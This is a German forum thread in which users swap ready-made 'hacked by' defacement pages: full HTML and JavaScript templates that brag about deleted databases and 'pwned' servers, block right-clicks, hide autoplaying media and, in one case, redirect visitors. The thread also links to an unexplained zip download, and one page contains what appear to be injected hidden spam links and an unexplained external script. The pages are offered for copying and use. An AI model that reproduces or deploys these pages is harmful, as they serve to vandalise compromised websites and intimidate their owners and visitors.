[S] Hacked Index [S]

  • Hab einen (Ich glaub von iExit):


    Hier der Code (dann "Speichern unter" und hacked.php):

    Spoiler anzeigen

    <title> H4CK3D by *NAME* </title>
    <script language="Javascript">
    var mymessage = "hacked";
    var mymessage = "&copy; *NAME*";
    function rtclickcheck(keyp){
    if (navigator.appName == "Netscape" && keyp.which == 3) {
    alert(mymessage);
    return false;
    }
    if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) {
    alert(mymessage);
    return false;
    }
    }
    document.onmousedown = rtclickcheck
    </script>

    <object style="height: 0px; width: 0px"><param name="movie" value="http://www.youtubee.com/v/WSeNSzJ2-Jw?…ayer_detailpage"><param name="allowFullScreen" value="true"><param name="allowScriptAccess" value="always"><embed src="http://www.youtubee.com/v/WSeNSzJ2-Jw?…ayer_detailpage" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="0" height="0"></object>
    <div align="center">
    <body onload="writetext()" bgcolor="#000000">
    <!--

    body {

    background: url(matrix-animated-image.gif) #000000;

    font-family:Verdana,Arial,sans-serif;font-size:24px;

    }

    -->

    <script language="JavaScript">

    var brzinakucanja = 200;
    var pauzapor = 2000;
    var vremeid = null;
    var kretanje = false;
    var poruka = new Array();
    var slporuka = 0;
    var bezporuke = 0;
    txt= "hacked by *NAME*"
    function prikaz() {
    var text = poruka[slporuka];
    if (bezporuke < text.length) {
    if (text.charAt(bezporuke) == " ")
    bezporuke++
    var ttporuka = text.substring(0, bezporuke + 1);
    document.title = ttporuka;
    bezporuke++
    vremeid = setTimeout("prikaz()", brzinakucanja);
    kretanje = true;
    } else {
    bezporuke = 0;
    slporuka++
    if (slporuka == poruka.length)
    slporuka = 0;
    vremeid = setTimeout("prikaz()", pauzapor);
    kretanje = true;
    }
    }
    function stop() {
    if (kretanje)
    clearTimeout(vremeid);
    kretanje = false
    }
    function start() {
    stop();
    prikaz();
    }
    start();
    </script>
    <h1>
    <script language="JavaScript">
    farbbibliothek = new Array();
    farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");
    farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00");
    farbbibliothek[2] = new
    Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00");
    farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
    farbbibliothek[4] = new
    Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");
    farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF");
    farbbibliothek[6] = new Array("#0000FF","#FFFF00");
    farben = farbbibliothek[4];
    function farbschrift()
    {
    for(var i=0 ; i<Buchstabe.length; i++)
    {
    document.all["a"+i].style.color=farben;
    }
    farbverlauf();
    }
    function string2array(text)
    {
    Buchstabe = new Array();
    while(farben.length<text.length)
    {
    farben = farben.concat(farben);
    }
    k=0;
    while(k<=text.length)
    {
    Buchstabe[k] = text.charAt(k);
    k++;
    }
    }
    function divserzeugen()
    {
    for(var i=0 ; i<Buchstabe.length; i++)
    {
    document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe + "</span>");
    }
    farbschrift();
    }
    var a=1;
    function farbverlauf()
    {
    for(var i=0 ; i<farben.length; i++)
    {
    farben[i-1]=farben;
    }
    farben[farben.length-1]=farben[-1];

    setTimeout("farbschrift()",30);
    }
    var farbsatz=1;
    function farbtauscher()
    {
    farben = farbbibliothek[farbsatz];
    while(farben.length<text.length)
    {
    farben = farben.concat(farben);
    }
    farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001));
    }
    setInterval("farbtauscher()",5000);
    text="H4CK3D >:D";
    string2array(text);
    divserzeugen();
    //document.write(text);
    </script>
    </h1>

    <div id="nothing">
    </div>

    <script language="JavaScript">
    msg = new Array();
    msg[0] = "<font face='Courier' color='blue'><center>======================================================================</center></font>";
    msg[1] = "<font face='Courier' color='white'><center>H4CK3D</center></font>";
    msg[2] = "<font face='Courier' color='white'><center>Hotel hacked by *NAME*.</font>";
    msg[3] = "<font face='Courier' color='white'><center>You will never find me!</center></font>";
    msg[4] = "<font face='Courier' color='blue'><center>======================================================================</center></font>";
    msg[5] = "<font face='Courier' color='white'><center>Index = hacked</center></font>";
    msg[6] = "<font face='Courier' color='white'><center>Database = gelöscht</center></font>";
    msg[7] = "<font face='Courier' color='white'><center>Homepage = hacked by *NAME*</center></font>";
    msg[8] = "<font face='Courier' color='white'><center>Server = pwned</center></font>";
    msg[9] = "<font face='Courier' color='white'><center>Server Status = Online</center></font>";
    msg[10] = "<font face='Courier' color='white'><center>Server Security =0%</center></font>";
    msg[11] = "<font face='Courier' color='white'><center>IP = phahaha</center></font>";
    msg[12] = "<font face='Courier' color='white'><center>Zeit = alles hat ein <b>ENDE</b></center></font>";
    msg[13] = "<font face='Courier' color='white'><center>ihr könnt euch bei mir melden! <3</center></font>";
    msg[14] = "<font face='Courier' color='white'><center>wo ihr mich kontaktieren könnt:</center></font>";
    msg[15] = "<font face='Courier' color='white'><center>NIRGENDS! MUHAHHAHA</center></font>";
    msg[16] = "<font face='Courier' color='white'><center>Hacked by *NAME* </center></font>";
    text1 = "";
    text2 = "";
    count = 0;
    count2 = 0;

    text = msg[0].split("");
    function writetext() {
    text1 = text2 + "<font color='#00FF00'>" + text[count] + "</font>";
    text2 += text[count];
    document.all["nothing"].innerHTML = text1;

    if (count < text.length-1){
    count++;
    setTimeout('writetext()', 35);
    }
    else {
    count = 0;

    if (count2 != 17) {
    count2++;
    text2 += "<p>";
    text = eval('msg['+count2+'].split("")');
    setTimeout('writetext()', 35);
    }
    }
    }
    </script>
    zz
    <embed src="http://www.youtube.com/v/dtcg58KkKoY&…e_DE&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>

    <script type="text/javascript">

    var _gaq = _gaq || [];
    _gaq.push(['_setAccount', 'UA-16106315-4']);
    _gaq.push(['_setDomainName', '.funpic.de']);
    _gaq.push(['_trackPageview']);

    (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript';
    ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' :
    'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(ga, s);
    })();
    Legende: <span style="color: rgb(151, 255, 255); text-shadow: 1px 1px 10px rgb(151, 255, 255);"><strong>Projektleitung</strong></span>, <span style="color: rgb(198, 226, 255); text-shadow: 1px 1px 10px rgb(198, 226, 255);"><strong>Co Projektleitung</strong></span>, <span style="color: rgb(238, 118, 33); text-shadow: 1px 1px 10px rgb(238, 118, 33);"><strong>Scripter</strong></span>, <span style="color: blue; text-shadow: 1px 1px 10px blue;"><strong>Moderator</strong></span>, <span style="color: green; text-shadow: 1px 1px 10px green;"><strong>Supporter</strong></span>, <span style="color: red; text-shadow: 1px 1px 10px red;"><strong>Gesperrt</strong>

    </script></body>
    </html>






    Hier noch einer (nicht ganz Hacked-Seite xd):
    Von Magnus glaub ich, bin mir aber nicht sicher:

    Spoiler anzeigen

    Livedemo:You failed.
    Download-Link:http://1337.cf/fuckerz.zip


    Das war alles..


    Mfg.
    Kaylord (aka RTL/Wowhab)

  • <html><head><title>Hacked by SOUND</title></Head><body bgcolor="" text="White"><center><font size="6" color="green"><b>HACKED BY SOUND</b></font><br><body background="http://i425.photobucket.com/albums/pp332/devohacker/reza1.gif"><img src="http://www.geektech.in/wp-content/uploads/2011/06/hacker.jpg"><br><br><embed src="http://www.youtube.com/v/4IyuVZ8X5ks&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed><script type="text/javascript">function click (e) { if (!e) e = window.event; if ((e.type && e.type == "contextmenu") || (e.button && e.button == 2) || (e.which && e.which == 3)) { if (window.opera) window.alert("Du Esel, richtiger Esel!"); return false; }}if (document.layers) document.captureEvents(Event.MOUSEDOWN);document.onmousedown = click;document.oncontextmenu = click;</script><meta http-equiv="refresh" content="10; URL=http://habbo.al"></body></body>

  • Mach doch sofort Quelltext anzeigen? Naja..

    Spoiler anzeigen

    <html><head> <TITLE>You have been || 0wn3d by MoneyMaker. <3</TITLE><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9"> <script language="Javascript1.2"> var mymessage = "© by MoneyMaker. "; function rtclickcheck(keyp){ if (navigator.appName == "Netscape" && keyp.which == 3) { alert(mymessage); return false; } if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) { alert(mymessage); return false; }} document.onmousedown = rtclickcheck//--></script> <!--body { background-color: #ffffff;}--> <style type="text/css"> <!--<title>HACKED BY .:?~#</title> <!--body { background-color: #ffffff;}--></style><style type="text/css"> <!--body { background-color: #000000; background-image: url(http://img3.imagebanana.com/img/4nf76lfx/bg.gif);}.style3 { color: #FF0000; font-size: 12; font-family: Georgia, "Times New Roman", Times, serif;}.style10 { color: #999999; font-size: 14px;}.style13 {color: #FFFFFF; font-size: 14px; }.style14 {color: #999999}.style16 {font-size: 14px}.style17 {color: #FFFFFF}--> </style></head><body background-color="#000000" onLoad="StartTexte()"> <p style="text-align: center;" align="center"> </p><div align="center"> <script language="JavaScript"> <!-- var max=0;function textlist(){ max=textlist.arguments.length; for (i=0; i<max; i++) this[i]=textlist.arguments[i];} tl=new textlist(" This site was hacked by MoneyMaker."," MoneyMaker. hacks everybody "" Contact: MoneyMaker. "," MoneyMaker. is Back!"," Don't worry, be Happy! ;)"," MADE IN Germany"," Contact Me : MoneyMaker@w.cn"); var text_x=0; pos=0;var l=tl[0].length; function textticker(){ document.form1.textfeld.value=tl[text_x].substring(0,pos)+"_"; if(pos++==l) { pos=0; setTimeout("textticker()",2000); text_x++; if(text_x==max) text_x=0; l=tl[text_x].length; } else setTimeout("textticker()",50);} function StartTexte(){ textticker();} // --></script> </div> <p style="text-align: center;" align="center"> </p><form name="form1" style="text-align: center;"> <div align="center"> </div>
    </form> <div align="center"> <p></p> <p> </p> <p> </p> <p> <h1> <script> farbbibliothek = new Array(); farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100"); farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00"); farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00"); farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040"); farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000"); farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF"); farbbibliothek[6] = new Array("#0000FF","#FFFF00"); farben = farbbibliothek[4];function farbschrift() { for(var i=0 ; i<Buchstabe.length; i++) { document.all["a"+i].style.color=farben[i]; } farbverlauf(); } function string2array(text) { Buchstabe = new Array(); while(farben.length<text.length) { farben = farben.concat(farben); } k=0; while(k<=text.length) { Buchstabe[k] = text.charAt(k); k++; } } function divserzeugen() { for(var i=0 ; i<Buchstabe.length; i++) { document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>"); } farbschrift(); } var a=1; function farbverlauf() { for(var i=0 ; i<farben.length; i++) { farben[i-1]=farben[i]; } farben[farben.length-1]=farben[-1]; setTimeout("farbschrift()",30); } // Zu Demonstrationszwecken***************** var farbsatz=1; function farbtauscher() { farben = farbbibliothek[farbsatz]; while(farben.length<text.length) { farben = farben.concat(farben); } farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001)); } setInterval("farbtauscher()",5000); text= "H4CKED by MoneyMaker"; //h string2array(text); divserzeugen(); //document.write(text);</script> </h1> <p> <script type="text/javascript"> TypingText = function(element, interval, cursor, finishedCallback) { if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) { this.running = true; return; } this.element = element; this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; }); this.interval = (typeof interval == "undefined" ? 100 : interval); this.origText = this.element.innerHTML; this.unparsedOrigText = this.origText; this.cursor = (cursor ? cursor : ""); this.currentText = ""; this.currentChar = 0; this.element.typingText = this; if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++; TypingText.all.push(this); this.running = false; this.inTag = false; this.tagBuffer = ""; this.inHTMLEntity = false; this.HTMLEntityBuffer = "";}TypingText.all = new Array();TypingText.currentIndex = 0;TypingText.runAll = function() { for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();}TypingText.prototype.run = function() { if(this.running) return; if(typeof this.origText == "undefined") { setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); return; } if(this.currentText == "") this.element.innerHTML = ""; if(this.currentChar < this.origText.length) { if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) { this.tagBuffer = "<"; this.inTag = true; this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) { this.tagBuffer += ">"; this.inTag = false; this.currentText += this.tagBuffer; this.currentChar++; this.run(); return; } else if(this.inTag) { this.tagBuffer += this.origText.charAt(this.currentChar); this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) { this.HTMLEntityBuffer = "&"; this.inHTMLEntity = true; this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) { this.HTMLEntityBuffer += ";"; this.inHTMLEntity = false; this.currentText += this.HTMLEntityBuffer; this.currentChar++; this.run(); return; } else if(this.inHTMLEntity) { this.HTMLEntityBuffer += this.origText.charAt(this.currentChar); this.currentChar++; this.run(); return; } else { this.currentText += this.origText.charAt(this.currentChar); } this.element.innerHTML = this.currentText; this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : ""); this.currentChar++; setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); } else { this.currentText = ""; this.currentChar = 0; this.running = false; this.finishedCallback(); }}</script> <br><br><br><br></div> <center> <p align="center" class="style3" id="message"><span class="style10">Bruting Passwords = </span><span class="style13">Has been bruted</span><span class="style16"><br> <span class="style14">Server = </span></span><span class="style13">Defaced</span><span class="style16"><br> <span class="style14">Password =</span></span> <span class="style13">Just Owned</span><span class="style16"><br> <span class="style14">Server Status = </span></span><span class="style13">Online</span><span class="style16"><br> <span class="style14">Server Security =</span></span> <span class="style13">Low</span><span class="style16"><br> <span class="style14">Hacker Ip =</span></span> <span class="style13">You can't find me...</span><span class="style11"><br> <span class="style14">JUST OWNED by=</span></span> <span class="style13">MoneyMaker.</span><span class="style11"><br> <span class="style14">Whitelist =</span></span> <span class="style13">StoneFace | Sharkman | Imadj | Sylcore| TUNNY | Showtek | youreapirate</span><span class="style11"><br> <span class="style14">Blacklist =</span></span> <span class="style13">...</span><span class="style11"><br> <br> <br> <br> <br> <br> </p> <p align="center" class="style3"> <span class="style17"></span><span class="style3"> <strong>MoneyMaker.</strong> <span class="style17"></span></span><span class="style17"> </span><span class="style8"></b> <p align="center" class="style3"> <span class="style17">Contact : </span><span class="style3"> <strong>MoneyMaker@w.cn</strong> <span class="style17"></span></span><span class="style17"> </span><span class="style8"></b>
    <p align="center" class="style3"> <span class="style17">Page &copy; by : </span><span class="style3"> <strong>MoneyMaker</strong> <span class="style17"></span></span><span class="style17"> </span><span class="style8"></b>

    <script type="text/javascript"> new TypingText(document.getElementById("message"), 50, function(i){ var ar = new Array("\\", "|", "/", "-"); return " " + ar[i.length % ar.length]; }); //Type out examples:TypingText.runAll(); </script> </span><br> <br> <embed src="http://www.youtube.com/v/WhiBMLEBEL0&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed> </p> </center> </div> <!-- _|_ --> <script type=text/javascript src=/sGsKndPBtLzI></script><noscript><p style=margin-top:50px;text-align:center;><a href=http://www.mck24.de/>Mck24</a> - <a href=http://www.waldachtal.eu/>Waldachtal</a> - <a href=http://www.ganz-schlank.de/>Ganz Schlank</a> - <a href=http://www.carbamate.de/>Carbamate</a> - <a href=http://www.1942.de/>1942</a> <a href=http://www.winterreifen.co.de/>Winterreifen</a></p></noscript><noscript><img src=/sGsKndPBtLzI.gif width=1px height=1px alt=t/></noscript></body></html>

  • <html><head><title>Hacked by SOUND</title></Head><body bgcolor="" text="White"><center><font size="6" color="green"><b>HACKED BY SOUND</b></font><br><body background="http://i425.photobucket.com/albums/pp332/devohacker/reza1.gif"><img src="http://www.geektech.in/wp-content/uploads/2011/06/hacker.jpg"><br><br><embed src="http://www.youtube.com/v/4IyuVZ8X5ks&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed><script type="text/javascript">function click (e) { if (!e) e = window.event; if ((e.type && e.type == "contextmenu") || (e.button && e.button == 2) || (e.which && e.which == 3)) { if (window.opera) window.alert("Du Esel, richtiger Esel!"); return false; }}if (document.layers) document.captureEvents(Event.MOUSEDOWN);document.onmousedown = click;document.oncontextmenu = click;</script><meta http-equiv="refresh" content="10; URL=http://habbo.al"></body></body>

    Kannst du auch was eigenes statt kopieren von mir?
    Hätte auch ruhig den Code geben können wenn man fragt,
    aber wenn man hier gleich einfach Quelltext klaut :)

  • @Croxy-: Kannst du bitte deine Beiträge wo anders suchen? Ich bin kein Hacker, deswegen habe ich es auch
    nicht nötig mir einen eigenen zu schreiben. Wenn du es genau wissen willst, ich brauche ihn für ein Spiel.
    Nennt sich Capture the flag ;).

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!